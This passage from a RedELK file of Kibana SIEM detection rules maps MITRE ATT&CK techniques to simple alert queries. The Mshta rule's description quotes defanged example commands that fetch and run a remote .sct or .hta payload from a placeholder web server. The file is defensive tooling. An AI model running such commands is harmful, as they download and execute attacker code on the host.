ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1037","name":"Logon Scripts","id":"T1037"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges).\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.[1]\nA specific plist used for execution at login is com.apple.loginitems.plist.[2] Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.[3] Users have direct control over login items installed using a shared file list which are also visible in System Preferences [3]. Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in [4] [5]. The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like AppleScript can do this as well. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1162","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1162] Login Item","query":"threat.technique.id: T1162","references":["https://attack.mitre.org/techniques/T1162","https://attack.mitre.org/techniques/T1547/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1162","name":"Login Item","id":"T1162"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. [1]\nA specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. [2] [3]\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1185","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1185] Man in the Browser","query":"threat.technique.id: T1185","references":["https://attack.mitre.org/techniques/T1185"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1185","name":"Man in the Browser","id":"T1185"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\nRenaming abusable system utilities to evade security monitoring is also a form of Masquerading.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1036","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1036] Masquerading","query":"threat.technique.id: T1036","references":["https://attack.mitre.org/techniques/T1036"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1036","name":"Masquerading","id":"T1036"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[1] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\nAn adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1031","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1031] Modify Existing Service","query":"threat.technique.id: T1031","references":["https://attack.mitre.org/techniques/T1031","https://attack.mitre.org/techniques/T1543/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1031","name":"Modify Existing Service","id":"T1031"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. [1] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. [2] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. [3] [4]\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. [5] Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1112","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1112] Modify Registry","query":"threat.technique.id: T1112","references":["https://attack.mitre.org/techniques/T1112"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1112","name":"Modify Registry","id":"T1112"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1104","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1104] Multi-Stage Channels","query":"threat.technique.id: T1104","references":["https://attack.mitre.org/techniques/T1104"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1104","name":"Multi-Stage Channels","id":"T1104"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1170","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1170] Mshta","query":"threat.technique.id: T1170","references":["https://attack.mitre.org/techniques/T1170","https://attack.mitre.org/techniques/T1218/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1170","name":"Mshta","id":"T1170"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1170","name":"Mshta","id":"T1170"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Multiband Communication","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1026","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1026] Multiband Communication","query":"threat.technique.id: T1026","references":["https://attack.mitre.org/techniques/T1026"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1026","name":"Multiband Communication","id":"T1026"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1188","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1188] Multi-hop Proxy","query":"threat.technique.id: T1188","references":["https://attack.mitre.org/techniques/T1188","https://attack.mitre.org/techniques/T1090/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1188","name":"Multi-hop Proxy","id":"T1188"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1079","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1079] Multilayer Encryption","query":"threat.technique.id: T1079","references":["https://attack.mitre.org/techniques/T1079","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1079","name":"Multilayer Encryption","id":"T1079"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. [1] Within MFT entries are file attributes, [2] such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). [1] [3] [4] [5]\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. [6] [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1096","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1096] NTFS File Attributes","query":"threat.technique.id: T1096","references":["https://attack.mitre.org/techniques/T1096","https://attack.mitre.org/techniques/T1564/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1096","name":"NTFS File Attributes","id":"T1096"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes[1] and to support other malicious activities, including distraction[2], hacktivism, and extortion.[3]\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nFor DoS attacks targeting the hosting system directly, see Endpoint Denial of Service.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1498","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1498] Network Denial of Service","query":"threat.technique.id: T1498","references":["https://attack.mitre.org/techniques/T1498"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1498","name":"Network Denial of Service","id":"T1498"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. [1] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. [2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1128","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1128] Netsh Helper DLL","query":"threat.technique.id: T1128","references":["https://attack.mitre.org/techniques/T1128","https://attack.mitre.org/techniques/T1546/007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1128","name":"Netsh Helper DLL","id":"T1128"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1046","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1046] Network Service Scanning","query":"threat.technique.id: T1046","references":["https://attack.mitre.org/techniques/T1046"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1046","name":"Network Service Scanning","id":"T1046"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nFile sharing over a Windows network occurs over the SMB protocol. [1] [2] Net can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.\nCloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1135","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1135] Network Share Discovery","query":"threat.technique.id: T1135","references":["https://attack.mitre.org/techniques/T1135"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1135","name":"Network Share Discovery","id":"T1135"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\\share /delete command. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1126","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1126] Network Share Connection Removal","query":"threat.technique.id: T1126","references":["https://attack.mitre.org/techniques/T1126","https://attack.mitre.org/techniques/T1070/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1126","name":"Network Share Connection Removal","id":"T1126"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1040","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1040] Network Sniffing","query":"threat.technique.id: T1040","references":["https://attack.mitre.org/techniques/T1040"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1040","name":"Network Sniffing","id":"T1040"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1040","name":"Network Sniffing","id":"T1040"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[1] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\nAn adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1050","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1050] New Service","query":"threat.technique.id: T1050","references":["https://attack.mitre.org/techniques/T1050","https://attack.mitre.org/techniques/T1543/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1050","name":"New Service","id":"T1050"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1050","name":"New Service","id":"T1050"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [1] Adversaries may also used compressed or archived scripts, such as JavaScript.\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. [2] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. [3]\nAdversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. [4] [5][6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1027","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1027] Obfuscated Files or Information","query":"threat.technique.id: T1027","references":["https://attack.mitre.org/techniques/T1027"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1027","name":"Obfuscated Files or Information","id":"T1027"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[1] These persistence mechanisms can work within Outlook or be used through Office 365.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1137","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1137] Office Application Startup","query":"threat.technique.id: T1137","references":["https://attack.mitre.org/techniques/T1137"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1137","name":"Office Application Startup","id":"T1137"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.[1] This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.[2]\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.[3] This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.[4][3]\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.[5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1502","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1502] Parent PID Spoofing","query":"threat.technique.id: T1502","references":["https://attack.mitre.org/techniques/T1502","https://attack.mitre.org/techniques/T1134/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE 